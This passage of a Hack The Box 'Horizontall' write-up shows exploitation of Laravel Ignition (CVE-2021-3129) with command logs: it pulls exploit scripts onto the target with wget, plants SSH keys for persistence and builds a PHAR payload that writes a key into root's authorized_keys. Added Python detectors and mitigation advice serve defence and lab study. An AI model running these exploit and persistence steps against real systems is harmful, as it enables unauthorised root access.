4.249-2.506 8.713-2.506 13.389 0 4.774.834 9.26 2.506 13.459 1.669 4.202 4.009 7.925 7.016 11.169 3.007 3.246 6.609 5.799 10.811 7.66 4.199 1.861 8.828 2.792 13.89 2.792 3.913 0 7.804-.955 11.669-2.863 3.866-1.908 6.849-4.533 8.949-7.875v9.021h15.607V78.182h-15.607v9.02zm-1.432 32.503c-.955 2.578-2.291 4.821-4.009 6.73-1.719 1.91-3.795 3.437-6.229 4.582-2.435 1.146-5.133 1.718-8.091 1.718-2.96 0-5.633-.572-8.019-1.718-2.387-1.146-4.438-2.672-6.156-4.582-1.719-1.909-3.032-4.152-3.938-6.73-.909-2.577-1.36-5.298-1.36-8.161 0-2.864.451-5.585 1.36-8.162.905-2.577 2.219-4.819 3.938-6.729 1.718-1.908 3.77-3.437 6.156-4.582 2.386-1.146 5.059-1.718 8.019-1.718 2.958 0 5.656.572 8.091 1.718 2.434 1.146 
4.51 2.674 6.229 4.582 1.718 1.91 3.054 4.152 4.009 6.729.953 2.577 1.432 5.298 1.432 8.162 0 2.863-.479 5.584-1.432 8.161zM650.772 44.676h-15.606v100.23h15.606V44.676zM365.013 144.906h15.607V93.538h26.776V78.182h-42.383v66.724zM542.133 78.182l-19.616 51.096-19.616-51.096h-15.808l25.617 66.724h19.614l25.617-66.724h-15.808zM591.98 76.466c-19.112 0-34.239 15.706-34.239 35.079 0 21.416 14.641 35.079 36.239 35.079 12.088 0 19.806-4.622 29.234-14.688l-10.544-8.158c-.006.008-7.958 10.449-19.832 10.449-13.802 0-19.612-11.127-19.612-16.884h51.777c2.72-22.043-11.772-40.877-33.023-40.877zm-18.713 29.28c.12-1.284 1.917-16.884 18.589-16.884 16.671 0 18.697 15.598 18.813 16.884h-37.402zM184.068 43.892c-.024-.088-.073-.165-.104-.25-.058-.157-.108-.316-.191-.46-.056-.097-.137-.176-.203-.265-.087-.117-.161-.242-.265-.345-.085-.086-.194-.148-.29-.223-.109-.085-.206-.182-.327-.252l-.002-.001-.002-.002-35.648-20.524a2.971 2.971 0 00-2.964 0l-35.647 20.522-.002.002-.002.001c-.121.07-.219.167-.327.252-.096.075-.205.138-.29.223-.103.103-.178.228-.265.345-.066.089-.147.169-.203.265-.083.144-.133.304-.191.46-.031.085-.08.162-.104.25-.067.249-.103.51-.103.776v38.979l-29.706 17.103V24.493a3 3 0 00-.103-.776c-.024-.088-.073-.165-.104-.25-.058-.157-.108-.316-.191-.46-.056-.097-.137-.176-.203-.265-.087-.117-.161-.242-.265-.345-.085-.086-.194-.148-.29-.223-.109-.085-.206-.182-.327-.252l-.002-.001-.002-.002L40.098 1.396a2.971 2.971 0 00-2.964 0L1.487 21.919l-.002.002-.002.001c-.121.07-.219.167-.327.252-.096.075-.205.138-.29.223-.103.103-.178.228-.265.345-.066.089-.147.169-.203.265-.083.144-.133.304-.191.46-.031.085-.08.162-.104.25-.067.249-.103.51-.103.776v122.09c0 1.063.568 2.044 1.489 2.575l71.293 41.045c.156.089.324.143.49.202.078.028.15.074.23.095a2.98 2.98 0 001.524 0c.069-.018.132-.059.2-.083.176-.061.354-.119.519-.214l71.293-41.045a2.971 2.971 0 001.489-2.575v-38.979l34.158-19.666a2.971 2.971 0 001.489-2.575V44.666a3.075 3.075 0 00-.106-.774zM74.255 143.167l-29.648-16.779 
31.136-17.926.001-.001 34.164-19.669 29.674 17.084-21.772 12.428-43.555 24.863zm68.329-76.259v33.841l-12.475-7.182-17.231-9.92V49.806l12.475 7.182 17.231 9.92zm2.97-39.335l29.693 17.095-29.693 17.095-29.693-17.095 29.693-17.095zM54.06 114.089l-12.475 7.182V46.733l17.231-9.92 12.475-7.182v74.537l-17.231 9.921zM38.614 7.398l29.693 17.095-29.693 17.095L8.921 24.493 38.614 7.398zM5.938 29.632l12.475 7.182 17.231 9.92v79.676l.001.005-.001.006c0 .114.032.221.045.333.017.146.021.294.059.434l.002.007c.032.117.094.222.14.334.051.124.088.255.156.371a.036.036 0 00.004.009c.061.105.149.191.222.288.081.105.149.22.244.314l.008.01c.084.083.19.142.284.215.106.083.202.178.32.247l.013.005.011.008 34.139 19.321v34.175L5.939 144.867V29.632h-.001zm136.646 115.235l-65.352 37.625V148.31l48.399-27.628 16.953-9.677v33.862zm35.646-61.22l-29.706 17.102V66.908l17.231-9.92 12.475-7.182v33.841z"/>
</g>
</svg>
</div>

<div class="mt-8 bg-white dark:bg-gray-800 overflow-hidden shadow sm:rounded-lg">
<div class="grid grid-cols-1 md:grid-cols-2">
<div class="p-6">
<div class="flex items-center">
<svg fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" class="w-8 h-8 text-gray-500"><path d="M12 6.253v13m0-13C10.832 5.477 9.246 5 7.5 5S4.168 5.477 3 6.253v13C4.168 18.477 5.754 18 7.5 18s3.332.477 4.5 1.253m0-13C13.168 5.477 14.754 5 16.5 5c1.747 0 3.332.477 4.5 1.253v13C19.832 18.477 18.247 18 16.5 18c-1.746 0-3.332.477-4.5 1.253"></path></svg>
<div class="ml-4 text-lg leading-7 font-semibold"><a href="https://laravel.com/docs" class="underline text-gray-900 dark:text-white">Documentation</a></div>
</div>

<div class="ml-12">
<div class="mt-2 text-gray-600 dark:text-gray-400 text-sm">
Laravel has wonderful, thorough documentation covering every aspect of the framework. Whether you are new to the framework or have previous experience with Laravel, we recommend reading all of the documentation from beginning to end.
</div>
</div>
</div>

<div class="p-6 border-t border-gray-200 dark:border-gray-700 md:border-t-0 md:border-l">
<div class="flex items-center">
<svg fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" class="w-8 h-8 text-gray-500"><path d="M3 9a2 2 0 012-2h.93a2 2 0 001.664-.89l.812-1.22A2 2 0 0110.07 4h3.86a2 2 0 011.664.89l.812 1.22A2 2 0 0018.07 7H19a2 2 0 012 2v9a2 2 0 01-2 2H5a2 2 0 01-2-2V9z"></path><path d="M15 13a3 3 0 11-6 0 3 3 0 016 0z"></path></svg>
<div class="ml-4 text-lg leading-7 font-semibold"><a href="https://laracasts.com" class="underline text-gray-900 dark:text-white">Laracasts</a></div>
</div>

<div class="ml-12">
<div class="mt-2 text-gray-600 dark:text-gray-400 text-sm">
Laracasts offers thousands of video tutorials on Laravel, PHP, and JavaScript development. Check them out, see for yourself, and massively level up your development skills in the process.
</div>
</div>
</div>

<div class="p-6 border-t border-gray-200 dark:border-gray-700">
<div class="flex items-center">
<svg fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" class="w-8 h-8 text-gray-500"><path d="M7 8h10M7 12h4m1 8l-4-4H5a2 2 0 01-2-2V6a2 2 0 012-2h14a2 2 0 012 2v8a2 2 0 01-2 2h-3l-4 4z"></path></svg>
<div class="ml-4 text-lg leading-7 font-semibold"><a href="https://laravel-news.com/" class="underline text-gray-900 dark:text-white">Laravel News</a></div>
</div>

<div class="ml-12">
<div class="mt-2 text-gray-600 dark:text-gray-400 text-sm">
Laravel News is a community driven portal and newsletter aggregating all of the latest and most important news in the Laravel ecosystem, including new package releases and tutorials.
</div>
</div>
</div>

<div class="p-6 border-t border-gray-200 dark:border-gray-700 md:border-l">
<div class="flex items-center">
<svg fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" class="w-8 h-8 text-gray-500"><path d="M3.055 11H5a2 2 0 012 2v1a2 2 0 002 2 2 2 0 012 2v2.945M8 3.935V5.5A2.5 2.5 0 0010.5 8h.5a2 2 0 012 2 2 2 0 104 0 2 2 0 012-2h1.064M15 20.488V18a2 2 0 012-2h3.064M21 12a9 9 0 11-18 0 9 9 0 0118 0z"></path></svg>
<div class="ml-4 text-lg leading-7 font-semibold text-gray-900 dark:text-white">Vibrant Ecosystem</div>
</div>

<div class="ml-12">
<div class="mt-2 text-gray-600 dark:text-gray-400 text-sm">
Laravel's robust library of first-party tools and libraries, such as <a href="https://forge.laravel.com" class="underline">Forge</a>, <a href="https://vapor.laravel.com" class="underline">Vapor</a>, <a href="https://nova.laravel.com" class="underline">Nova</a>, and <a href="https://envoyer.io" class="underline">Envoyer</a> help you take your projects to the next level. Pair them with powerful open source libraries like <a href="https://laravel.com/docs/billing" class="underline">Cashier</a>, <a href="https://laravel.com/docs/dusk" class="underline">Dusk</a>, <a href="https://laravel.com/docs/broadcasting" class="underline">Echo</a>, <a href="https://laravel.com/docs/horizon" class="underline">Horizon</a>, <a href="https://laravel.com/docs/sanctum" class="underline">Sanctum</a>, <a href="https://laravel.com/docs/telescope" class="underline">Telescope</a>, and more.
</div>
</div>
</div>
</div>
</div>

<div class="flex justify-center mt-4 sm:items-center sm:justify-between">
<div class="text-center text-sm text-gray-500 sm:text-left">
<div class="flex items-center">
<svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="-mt-px w-5 h-5 text-gray-400">
<path d="M3 3h2l.4 2M7 13h10l4-8H5.4M7 13L5.4 5M7 13l-2.293 2.293c-.63.63-.184 1.707.707 1.707H17m0 0a2 2 0 100 4 2 2 0 000-4zm-8 2a2 2 0 11-4 0 2 2 0 014 0z"></path>
</svg>

<a href="https://laravel.bigcartel.com" class="ml-1 underline">
Shop
</a>

<svg fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" class="ml-4 -mt-px w-5 h-5 text-gray-400">
<path d="M4.318 6.318a4.5 4.5 0 000 6.364L12 20.364l7.682-7.682a4.5 4.5 0 00-6.364-6.364L12 7.636l-1.318-1.318a4.5 4.5 0 00-6.364 0z"></path>
</svg>

<a href="https://github.com/sponsors/taylorotwell" class="ml-1 underline">
Sponsor
</a>
</div>
</div>

<div class="ml-4 text-center text-sm text-gray-500 sm:text-right sm:ml-0">
Laravel v8 (PHP v7.4.18)
</div>
</div>
</div>
</div>
</body>
</html>
strapi@horizontall:~/myapi$

20. The page footer gives the framework and runtime versions:

Laravel v8 (PHP v7.4.18)

21. Search for known vulnerabilities. Laravel v8 with the Ignition debug page enabled points at CVE-2021-3129, documented in the ambionics post linked below

22. First attempt: the ambionics exploit. I copied it to the target over a Python HTTP server, but it depends on phpggc to build the PHAR payload, and phpggc is not present on the box:

https://github.com/ambionics/laravel-exploits

┌──(kali㉿kali)-[~/桌面]
└─$ touch laravel-ignition-rce.py

┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.105 - - [26/Dec/2023 23:05:28] "GET /laravel-ignition-rce.py HTTP/1.1" 200 -

strapi@horizontall:~/myapi$ wget http://10.10.14.2/laravel-ignition-rce.py
wget http://10.10.14.2/laravel-ignition-rce.py
--2023-12-26 15:05:28-- http://10.10.14.2/laravel-ignition-rce.py
Connecting to 10.10.14.2:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4684 (4.6K) [text/x-python]
Saving to: ‘laravel-ignition-rce.py’

laravel-ignition-rc 100%[===================>] 4.57K --.-KB/s in 0.001s

2023-12-26 15:05:29 (3.82 MB/s) - ‘laravel-ignition-rce.py’ saved [4684/4684]

strapi@horizontall:~/myapi$ php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id
<exploit.phar --fast-destruct monolog/rce1 system id
Could not open input file: ./phpggc
strapi@horizontall:~/myapi$ ls
ls
api extensions node_modules public
build favicon.ico package.json README.md
config laravel-ignition-rce.py package-lock.json
strapi@horizontall:~/myapi$

Background on the vulnerability: https://www.ambionics.io/blog/laravel-debug-rce

Second attempt, with an exploit that fetches phpggc itself: https://github.com/nth347/CVE-2021-3129_exploit

┌──(kali㉿kali)-[~/桌面]
└─$ touch poc.py

┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.105 - - [26/Dec/2023 23:05:28] "GET /laravel-ignition-rce.py HTTP/1.1" 200 -
10.10.11.105 - - [26/Dec/2023 23:17:51] "GET /poc.py HTTP/1.1" 200 -

strapi@horizontall:~/myapi$ wget http://10.10.14.2/poc.py

wget http://10.10.14.2/poc.py
--2023-12-26 15:17:51-- http://10.10.14.2/poc.py
Connecting to 10.10.14.2:80...
connected.
HTTP request sent, awaiting response... 200 OK
Length: 2935 (2.9K) [text/x-python]
Saving to: ‘poc.py’

poc.py 100%[===================>] 2.87K --.-KB/s in 0.001s

2023-12-26 15:17:52 (3.88 MB/s) - ‘poc.py’ saved [2935/2935]

strapi@horizontall:~/myapi$
strapi@horizontall:~/myapi$ chmod +x poc.py
chmod +x poc.py
strapi@horizontall:~/myapi$ ./exploit.py http://localhost:8000 Monolog/RCE1 id
< ./exploit.py http://localhost:8000 Monolog/RCE1 id
bash: ./exploit.py: No such file or directory
strapi@horizontall:~/myapi$ ./poc.py http://localhost:8000 Monolog/RCE1 id
./poc.py http://localhost:8000 Monolog/RCE1 id
[i] Trying to clear logs
[+] Logs cleared
[i] PHPGGC not found. Cloning it
Cloning into 'phpggc'...
fatal: unable to access 'https://github.com/ambionics/phpggc.git/': Could not resolve host: github.com
[-] Fail to convert logs to PHAR
[i] There is no output
[i] Trying to clear logs
[+] Logs cleared
strapi@horizontall:~/myapi$

23. The lab environment is clearly restrictive (the target cannot resolve github.com), so the better option is to forward the port out over SSH. The idea: place the public key from our Kali box into the current user's account on the target, then log in with SSH.

strapi@horizontall:~/myapi$ ls -la /home
ls -la /home
total 12
drwxr-xr-x 3 root root 4096 May 25 2021 .
drwxr-xr-x 24 root root 4096 Aug 23 2021 ..
drwxr-xr-x 8 developer developer 4096 Aug 2 2021 developer
strapi@horizontall:~/myapi$ ls -la /home/developer/.ssh
ls -la /home/developer/.ssh
ls: cannot open directory '/home/developer/.ssh': Permission denied
strapi@horizontall:~/myapi$ cd ../
cd ../
strapi@horizontall:~$ ls
ls
myapi
strapi@horizontall:~$ ls -la
ls -la
total 48
drwxr-xr-x 9 strapi strapi 4096 Aug 2 2021 .
drwxr-xr-x 3 root root 4096 May 26 2021 ..
-rw-r--r-- 1 strapi strapi 231 Jun 1 2021 .bash_logout
-rw-r--r-- 1 strapi strapi 3810 Jun 1 2021 .bashrc
drwx------ 2 strapi strapi 4096 May 26 2021 .cache
drwx------ 3 strapi strapi 4096 May 26 2021 .config
drwx------ 3 strapi strapi 4096 May 26 2021 .gnupg
drwxrwxr-x 3 strapi strapi 4096 Jun 1 2021 .local
drwxr-xr-x 9 strapi strapi 4096 Dec 26 15:18 myapi
drwxrwxr-x 5 strapi strapi 4096 Jun 3 2021 .npm
drwxrwxr-x 5 strapi strapi 4096 Dec 26 13:36 .pm2
-rw-r--r-- 1 strapi strapi 807 Apr 4 2018 .profile
strapi@horizontall:~$ mkdir .ssh
mkdir .ssh
strapi@horizontall:~$ cd .ssh/
cd .ssh/
strapi@horizontall:~/.ssh$

┌──(kali㉿kali)-[~/.ssh]
└─$ cat id_rsa.pub

strapi@horizontall:~/.ssh$ echo "ssh-rsa AAAEmopirH5MZzROwVXA3 kali@kali" >> authorized_keys
<QAEEmopirH5MZzROwVXA3 kali@kali" >> authorized_keys
strapi@horizontall:~/.ssh$ ls
ls
authorized_keys
strapi@horizontall:~/.ssh$

24. Now we set up the port forward.

┌──(kali㉿kali)-[~/.ssh]
└─$ ssh -L 8000:127.0.0.1:8000 strapi@10.10.11.105 -i ../.ssh/id_rsa
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue Dec 26 15:29:23 UTC 2023

System load: 0.03 Processes: 179
Usage of /: 82.2% of 4.85GB Users logged in: 0
Memory usage: 28% IP address for eth0: 10.10.11.105
Swap usage: 0%


0 updates can be applied immediately.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


Last login: Fri Jun 4 11:29:42 2021 from 192.168.1.15
$ id
uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)
$

25. Let's see what the page on port 8000 looks like.

http://127.0.0.1:8000/

26. Next we build the exploit locally on our own machine.

┌──(kali㉿kali)-[~/桌面]
└─$ git clone https://github.com/nth347/CVE-2021-3129_exploit.git
正克隆到 'CVE-2021-3129_exploit'...
remote: Enumerating objects: 9, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 9 (delta 1), reused 3 (delta 0), pack-reused 0
接收对象中: 100% (9/9), 完成.
处理 delta 中: 100% (1/1), 完成.

┌──(kali㉿kali)-[~/桌面]
└─$ cd CVE-2021-3129_exploit

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit]
└─$ chmod +x exploit.py

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit]
└─$ ./exploit.py http://localhost:8000 Monolog/RCE1 id
[i] Trying to clear logs
[+] Logs cleared
[i] PHPGGC not found. Cloning it
正克隆到 'phpggc'...
remote: Enumerating objects: 4112, done.
remote: Counting objects: 100% (965/965), done.
remote: Compressing objects: 100% (379/379), done.
remote: Total 4112 (delta 639), reused 721 (delta 561), pack-reused 3147
接收对象中: 100% (4112/4112), 575.11 KiB | 153.00 KiB/s, 完成.
处理 delta 中: 100% (1796/1796), 完成.
[+] Successfully converted logs to PHAR
[+] PHAR deserialized. Exploited

uid=0(root) gid=0(root) groups=0(root)

[i] Trying to clear logs
[+] Logs cleared

27. Commands run with root privileges, so let's try reading root.txt.

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit]
└─$ ./exploit.py http://localhost:8000 Monolog/RCE1 "cat /root/root.txt"
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[+] PHAR deserialized. Exploited

27b7d33ec67ae27cd030c9a9e6213ea0

[i] Trying to clear logs
[+] Logs cleared

28. For Hack The Box this would already be enough, but OSCP requires an interactive shell, which this tool does not provide, so we go back to the original approach and build the payload locally.

29. Here we use https://github.com/ambionics/laravel-exploits to build an ssh.phar file that writes our SSH public key. The earlier attempt failed because the phpggc tool was missing; the copy cloned by https://github.com/nth347/CVE-2021-3129_exploit can be used directly to generate it.

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit]
└─$ ls
exploit.py phpggc README.md

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit]
└─$ cd phpggc

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit/phpggc]
└─$ ls
Dockerfile lib phpggc templates
gadgetchains LICENSE README.md test-gc-compatibility.py

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit/phpggc]
└─$ ls -la
总计 80
drwxr-xr-x 6 kali kali 4096 12月26日 23:50 .
drwxr-xr-x 4 kali kali 4096 12月26日 23:49 ..
-rw-r--r-- 1 kali kali 369 12月26日 23:50 Dockerfile
drwxr-xr-x 38 kali kali 4096 12月26日 23:50 gadgetchains
drwxr-xr-x 8 kali kali 4096 12月26日 23:50 .git
drwxr-xr-x 3 kali kali 4096 12月26日 23:50 lib
-rw-r--r-- 1 kali kali 11358 12月26日 23:50 LICENSE
-rwxr-xr-x 1 kali kali 247 12月26日 23:50 phpggc
-rw-r--r-- 1 kali kali 18279 12月26日 23:50 README.md
drwxr-xr-x 2 kali kali 4096 12月26日 23:50 templates
-rwxr-xr-x 1 kali kali 14112 12月26日 23:50 test-gc-compatibility.py

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit/phpggc]
└─$ php -d'phar.readonly=0' ./phpggc --phar phar -o ssh.phar --fast-destruct monolog/rce1 system 'mkdir -p /root/.ssh; echo "ssh-rsa AAAAB3NQAEEmopirH5MZzROwVXA3 kali@kali" >> /root/.ssh/authorized_keys'

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit/phpggc]
└─$ ls
Dockerfile lib phpggc ssh.phar test-gc-compatibility.py
gadgetchains LICENSE README.md templates

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit/phpggc]
└─$ cp ~/桌面/laravel-ignition-rce.py ./laravel-ignition-rce.py

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit/phpggc]
└─$ ls
Dockerfile laravel-ignition-rce.py LICENSE README.md templates
gadgetchains lib phpggc ssh.phar test-gc-compatibility.py

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit/phpggc]
└─$ python3 ./laravel-ignition-rce.py http://127.0.0.1:8000 ssh.phar
+ Log file: /home/developer/myproject/storage/logs/laravel.log
+ Logs cleared
+ Successfully converted to PHAR !
+ Phar deserialized
Exploit succeeded
+ Logs cleared
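Both exploit runs above (steps 26 and 29) go through Ignition's `/_ignition/execute-solution` endpoint, which Laravel only exposes when debug mode is on, and hand MakeViewVariableOptionalSolution a `viewFile` that is a PHP stream wrapper instead of a template: `php://filter` to rewrite the log file and `phar://` to deserialize it (the "converted to PHAR" / "Phar deserialized" lines are the exploit reporting exactly that). The block below is an added example, not code from the writeup or from the exploit projects it links: a small detector that flags that pattern in a request log. It assumes a JSON-per-line log that records the path and the parsed JSON body (for example from a WAF or reverse proxy); the field names and all sample lines are constructed.

```python
"""Flag CVE-2021-3129 (Laravel Ignition) exploitation attempts in request logs.

Added example, not code from the writeup or the exploit projects it links.
Assumes a JSON-per-line request log that records the path and the parsed
JSON body (e.g. from a WAF or reverse proxy); the sample lines are constructed.
"""
import json
import re
from typing import Dict, Iterable, List, Optional, Tuple

IGNITION_PATH = "/_ignition/execute-solution"
VULN_SOLUTION = "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution"
# A view name never legitimately starts with a stream wrapper: php:// is what
# rewrites the log file and phar:// is what triggers the deserialization.
STREAM_WRAPPER = re.compile(r"^\s*(php|phar)://", re.IGNORECASE)

# Constructed sample log (field names are an assumption, not a product schema).
SAMPLE_LOG = r'''
{"ts": "2023-12-26T15:40:01Z", "src": "10.10.14.2", "method": "GET", "path": "/api/reviews", "body": null}
{"ts": "2023-12-26T15:40:05Z", "src": "10.10.14.2", "method": "POST", "path": "/_ignition/execute-solution", "body": {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "x", "viewFile": "php://filter/write=convert.base64-decode/resource=../storage/logs/laravel.log"}}}
{"ts": "2023-12-26T15:40:06Z", "src": "10.10.14.2", "method": "POST", "path": "/_ignition/execute-solution", "body": {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "x", "viewFile": "phar://../storage/logs/laravel.log"}}}
{"ts": "2023-12-26T15:41:00Z", "src": "192.168.1.15", "method": "POST", "path": "/_ignition/execute-solution", "body": {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "title", "viewFile": "/home/developer/myproject/resources/views/welcome.blade.php"}}}
not json at all
'''.strip()


def classify(entry: Dict) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) for one parsed request, or None if benign."""
    if entry.get("path") != IGNITION_PATH:
        return None
    body = entry.get("body") or {}
    params = body.get("parameters") or {}
    view_file = str(params.get("viewFile", ""))
    if STREAM_WRAPPER.match(view_file):
        return ("high", "viewFile is a PHP stream wrapper (php:// or phar://)")
    if body.get("solution") == VULN_SOLUTION:
        return ("medium", "MakeViewVariableOptionalSolution invoked via debug solution runner")
    # Any request reaching this path means Ignition's debug endpoints are served.
    return ("low", "Ignition solution runner reachable (debug mode on)")


def scan(lines: Iterable[str]) -> List[Dict]:
    """Scan log lines; unparseable lines are reported rather than silently dropped."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        line = line.strip()
        if not line:
            continue
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            findings.append({"line": line_no, "src": None, "severity": "parse-error",
                             "reason": "unparseable log line", "view_file": None})
            continue
        verdict = classify(entry)
        if verdict is None:
            continue
        severity, reason = verdict
        params = (entry.get("body") or {}).get("parameters") or {}
        findings.append({"line": line_no, "src": entry.get("src"), "severity": severity,
                         "reason": reason, "view_file": params.get("viewFile")})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"line {f['line']} [{f['severity']}] {f['src']}: {f['reason']} ({f['view_file']})")
```

The medium findings matter on their own: any client reaching the solution runner means the app is serving Ignition's debug endpoints, i.e. debug mode is on in a reachable environment. Mitigation is to disable debug mode outside development, update facade/ignition to 2.5.2 or later, and, as the `uid=0(root)` output in step 26 shows for this box, never run the PHP application process as root.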

30. At this point our public key is in the root user's authorized_keys on the target, so we log in directly with SSH.

┌──(kali㉿kali)-[~/.ssh]
└─$ ssh root@10.10.11.105 -i ../.ssh/id_rsa
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue Dec 26 16:12:54 UTC 2023

System load: 0.0 Processes: 180
Usage of /: 82.2% of 4.85GB Users logged in: 0
Memory usage: 28% IP address for eth0: 10.10.11.105
Swap usage: 0%

0 updates can be applied immediately.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Aug 23 11:27:49 2021 from 10.10.14.6
root@horizontall:~# ls
boot.sh pid restart.sh root.txt
root@horizontall:~# cat root.txt
27b7d33ec67ae27cd030c9a9e6213ea0
root@horizontall:~# id
uid=0(root) gid=0(root) groups=0(root)
root@horizontall:~#
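Steps 23 and 30 both obtain access the same way: a public key is appended to an `authorized_keys` file, first under the strapi user and then under /root through the Laravel process (which evidently runs as root, given the `uid=0(root)` output in step 26). From the defender's side that file is the persistence artefact to watch. The block below is an added example, not code from the writeup: it parses an authorized_keys file, computes each key's SHA256 fingerprint the way `ssh-keygen -l` does, and reports keys missing from an allowlist as well as malformed entries (such as the truncated key from the echo command above). The key blobs, the sample file and the allowlist are constructed test data; loading the allowlist from configuration management is an assumption.

```python
"""Audit authorized_keys files for keys that are not on an approved list.

Added example (not from the original writeup). The key blobs, the sample
file and the allowlist below are constructed; a real deployment would load
the allowlist from configuration management.
"""
import base64
import hashlib
import struct
from typing import Dict, Iterable, List


def _fake_ed25519_blob(seed: bytes) -> str:
    """Constructed test data: a syntactically valid ssh-ed25519 blob whose
    32 key bytes are just a hash of the seed, not a real public key."""
    key_type = b"ssh-ed25519"
    pub = hashlib.sha256(seed).digest()
    blob = struct.pack(">I", len(key_type)) + key_type + struct.pack(">I", len(pub)) + pub
    return base64.b64encode(blob).decode()


def fingerprint(b64_blob: str) -> str:
    """SHA256 fingerprint in the form `ssh-keygen -l` prints (unpadded base64)."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def blob_key_type(b64_blob: str) -> str:
    """Key type string embedded at the start of the wire-format blob."""
    raw = base64.b64decode(b64_blob)
    (n,) = struct.unpack(">I", raw[:4])
    return raw[4:4 + n].decode()


def parse_authorized_keys(text: str) -> List[Dict]:
    """Parse authorized_keys lines; tolerates a leading options field."""
    entries = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        # An options field (from="...", command="...") may precede the key type.
        idx = next((i for i, f in enumerate(fields)
                    if f.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or idx + 1 >= len(fields):
            entries.append({"line": line_no, "valid": False, "raw": line})
            continue
        key_type, blob = fields[idx], fields[idx + 1]
        try:
            fp, embedded = fingerprint(blob), blob_key_type(blob)
        except (ValueError, struct.error, UnicodeDecodeError):
            # Truncated or corrupt base64, as in a hand-typed key that lost characters.
            entries.append({"line": line_no, "valid": False, "raw": line})
            continue
        entries.append({
            "line": line_no,
            "valid": embedded == key_type,   # declared type must match the blob
            "type": key_type,
            "fingerprint": fp,
            "comment": " ".join(fields[idx + 2:]),
            "options": " ".join(fields[:idx]),
        })
    return entries


def audit(text: str, approved: Iterable[str]) -> List[Dict]:
    """Return entries that are malformed or whose fingerprint is not approved."""
    approved = set(approved)
    findings = []
    for entry in parse_authorized_keys(text):
        if not entry["valid"]:
            findings.append({**entry, "reason": "malformed entry or type mismatch"})
        elif entry["fingerprint"] not in approved:
            findings.append({**entry, "reason": "key not in allowlist"})
    return findings


# Constructed data: one approved key, one rogue key and one truncated line
# modelled on the echo command used in the writeup.
APPROVED_BLOB = _fake_ed25519_blob(b"approved-admin-key")
ROGUE_BLOB = _fake_ed25519_blob(b"attacker-key")
APPROVED_FINGERPRINTS = {fingerprint(APPROVED_BLOB)}
SAMPLE_AUTHORIZED_KEYS = f"""# managed by config management
from="10.0.0.0/8" ssh-ed25519 {APPROVED_BLOB} admin@bastion
ssh-ed25519 {ROGUE_BLOB} kali@kali
ssh-rsa AAAEmopirH5MZzROwVXA3 kali@kali
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_AUTHORIZED_KEYS, APPROVED_FINGERPRINTS):
        print(f"line {f['line']}: {f['reason']} ({f.get('comment') or f.get('raw')})")
```

Run it periodically (or from a file-integrity alert on `~/.ssh/authorized_keys` and `/root/.ssh/authorized_keys`) against the fingerprints your configuration management deployed; anything else in those files is either an operator shortcut or exactly the persistence shown in this writeup. Pairing it with `PermitRootLogin no` removes the second path entirely.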

0x03 Completion Proof

https://www.hackthebox.com/achievement/machine/1705469/374


Horizontall-htb-writeup
https://sh1yan.top/2023/12/26/Horizontall-htb-writeup/
Author: shiyan
